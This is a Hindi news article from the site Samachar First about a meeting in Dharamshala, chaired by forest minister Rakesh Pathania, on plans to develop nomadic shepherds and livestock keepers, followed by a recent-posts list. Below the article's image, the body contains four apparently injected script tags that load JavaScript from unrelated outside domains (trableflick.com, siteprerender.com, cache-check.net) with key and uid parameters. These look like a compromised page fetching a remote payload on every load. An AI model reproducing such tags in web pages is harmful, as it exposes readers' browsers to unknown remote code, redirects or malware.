Categories: हिमाचल

भेड़पालकों और पशु पालकों के विकास के लिये किये जायेंगे नवीन प्रयास: वन मंत्री

<p>वन, युवा और खेल मंत्री राकेश पठानिया ने धर्मशाला में हिमाचल प्रदेश एकीकृत विकास परियोजना की बैठक की अध्यक्षता करते हुये कहा कि भेड़-बकरी पालकों और पशु-पालकों का समुचित विकास होना चाहिए इस हेतू नवीन प्रयास करने की आवश्यकता है। उन्होंने एकीकृत परियोजना को पशु-पालन और वूल फेडरेशन के साथ मिलकर सभी गतिविधियों को सुनियोजित तरीके से अपनाने पर बल दिया। उन्होंने कहा कि घुमन्तु भेड़-पालकों के आवागमन के रास्तों की मैपिंग करने की आवश्यकता है और उन्हें कहां बेहतर सुविधा प्रदान हो सकती हैं यह स्थान चिन्हित करने की आवश्यकता है। घुमन्तु भेड़-पालकों को संकट की घड़ी मे उचित तकनीक वाले उपकरण दिये जाने चाहियें ताकि उनकी समय रहते मदद हो सके औऱ उनकी लोकेशन सम्बन्धित जानकारी विभाग को मिल सके।</p>

<p>उन्होंने कहा कि गद्दी नस्ल के उन्नत किस्म के कुत्ते भी भेड़-पालकों को उपलब्ध हों इस बारे मे पालमपुर विश्वविद्यालय से मिलकर कार्य किया जाये। उन्होंने कहा कि हिमाचल प्रदेश मे उत्पादित भेड़-बकरी का मांस जैविक और उन्नत किस्म का है उसे ऊंचे पायदान पर पहुंचाने हेतू पग उठाये जाने आवश्यक हैं। इस अवसर पर वूल फेडरेशन के अध्यक्ष त्रिलोक कपूर ने कहा कि पशु-पालन और वूल फेडरेशन ग्रामीण विकास खासकर भेड़-बकरी पालकों की आय में वृद्वि करने में एकीकृत विकास परियोजना के उदेश्यों को आपसी सहयोग के साथ विकास कर सकता है क्योंकि पशु-पालन विभाग और वूल फेडरेशन पशु पालकों के साथ सीधे तौर पर जुड़े हुए हैं चाहे वो ऊन खरीद हो, चाहे भेड़ों की ऊन कलप्न का विषय हो, चाहे प्रशिक्षण का हो या उनको स्वास्थ्य सुविधायें प्रदान करना हो।</p>

<p>इस अवसर पर एकीकृत विकास परियोजना के मुख्य परियोजना निदेशक डॉ पवनेश शर्मा ने मुख्यातिथि को एकीकृत विकास परियोजना के उदेश्यों और गतिविधियों के बारे में अवगत करवाते हुये बताया कि परियोजना का सीधा प्रभाव ग्रामीण विकास और उनकी आय बढ़ाने मे अहम भूमिका निभा सकता है।</p>

<p><img src=”/media/gallery/images/image(2213).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1612146433291″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

चंडीगढ़ सेक्टर 42 कॉलेज में हिमाचल की बेटी ने प्रेरणा ने मारी बाजी

चंडीगढ़ सेक्टर-42 के गवर्नमेंट पीजी गर्ल्स कॉलेज में चल रही चुनाव में हिमाचल प्रदेश के…

17 hours ago

संजौली मस्जिद विवाद को लेकर एमसी आयुक्त के कोर्ट में सुनवाई

सबंधित जेई और वक्फ बोर्ड को लगी फटकार, मामले की 5 अक्टूबर को अगली सुनवाई,जेई…

18 hours ago

इंस्पायर मानक अवार्ड के लिए 15 सितंबर तक छात्र करवा सकते है आवेदन

हमीरपुर, कांगड़ा व चंबा के छात्र लेंगे भाग अभी तक कई स्कूलों ने नहीं किया…

18 hours ago

निबंध लेखन में रितिका ने हासिल किया पहला स्थान

भाषा-संस्कृति विभाग जिला कांगडा़ द्वारा जिला स्तरीय राजभाषा हिन्दीं पखवाडे का आयोजन जी.ए.वी स्कूल कांगडा…

18 hours ago

परशुराम चौक बाजार में जलभराव की समस्या से मिली निजात, व्यापारी खुश

पांवटा साहिब- शहर में जल भराव की समस्या से निपटने के लिए नगर निगम द्वारा…

18 hours ago

राज्य में खेल गतिविधियों को बढ़ावा देने के लिए प्रदेश सरकार प्रतिबद्धः केवल पठानिया

धर्मशाला, 6 सितम्बर: उपमुख्य सचेतक व विधायक शाहपुर केवल सिंह पठानिया ने आज शाहपुर विधानसभा…

1 day ago